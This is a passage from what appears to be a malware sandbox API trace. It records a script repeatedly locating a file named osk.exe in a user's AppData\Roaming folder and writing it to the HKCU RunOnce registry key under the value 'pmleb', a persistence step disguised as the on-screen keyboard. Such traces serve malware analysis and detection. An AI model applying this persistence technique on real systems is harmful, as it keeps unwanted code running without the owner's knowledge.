[4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.559] IUnknown:Release (This=0x787518) returned 0x1 [0081.559] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.559] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.559] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.559] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.559] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.559] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.559] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.559] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.559] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.560] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3d [0081.560] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.560] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3e [0081.560] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.561] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3d [0081.561] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.561] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.561] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.561] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.561] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.561] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.561] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.561] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.562] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.562] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.562] RegCloseKey (hKey=0x280) returned 0x0 [0081.562] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.562] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.562] SetTimer (hWnd=0x20280, nIDEvent=0x20b9, uElapse=0xa, lpTimerFunc=0x0) returned 0x20b9 [0081.562] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.578] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.578] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.578] KillTimer (hWnd=0x20280, uIDEvent=0x20b9) returned 1 [0081.578] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.578] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.579] IUnknown:Release (This=0x787518) returned 0x1 [0081.579] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.579] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.579] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.579] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.579] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.579] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.579] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.579] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.579] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.579] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3e [0081.579] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.579] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3f [0081.580] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.580] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3e [0081.580] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.580] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.580] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.580] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.581] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.581] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.581] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.581] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.581] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.581] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.581] RegCloseKey (hKey=0x280) returned 0x0 [0081.581] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.581] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.581] SetTimer (hWnd=0x20280, nIDEvent=0x20ba, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ba [0081.582] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.594] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.594] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.594] KillTimer (hWnd=0x20280, uIDEvent=0x20ba) returned 1 [0081.594] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.594] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.595] IUnknown:Release (This=0x787518) returned 0x1 [0081.595] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.595] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.595] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.595] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.595] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.595] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.595] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.595] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.595] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.595] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3f [0081.595] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.595] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x40 [0081.595] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.596] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3f [0081.596] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.596] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.596] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.596] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.596] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.596] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.597] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.597] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.597] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.597] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.597] RegCloseKey (hKey=0x280) returned 0x0 [0081.597] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.597] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.597] SetTimer (hWnd=0x20280, nIDEvent=0x20bb, uElapse=0xa, lpTimerFunc=0x0) returned 0x20bb [0081.597] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, 